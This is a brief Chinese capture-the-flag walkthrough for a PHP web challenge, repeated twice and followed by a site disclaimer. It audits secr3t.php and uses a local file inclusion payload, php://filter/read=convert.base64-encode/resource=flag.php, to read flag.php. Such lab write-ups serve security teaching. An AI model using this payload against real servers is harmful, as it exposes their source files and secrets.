打开题目
查看源码
直接访问Archive_room.php
第二个页面是个点击框,这里bp抓包确认;若是直接SECRET,会跳到end.php
直接访问secr3t.php
代码审计一下
playload:secr3t.php?file=flag.php
改为php协议读取权限
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag
打开题目
查看源码
直接访问Archive_room.php
第二个页面是个点击框,这里bp抓包确认;若是直接SECRET,会跳到end.php
直接访问secr3t.php
代码审计一下
playload:secr3t.php?file=flag.php
改为php协议读取权限
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码得到flag
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1967291.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!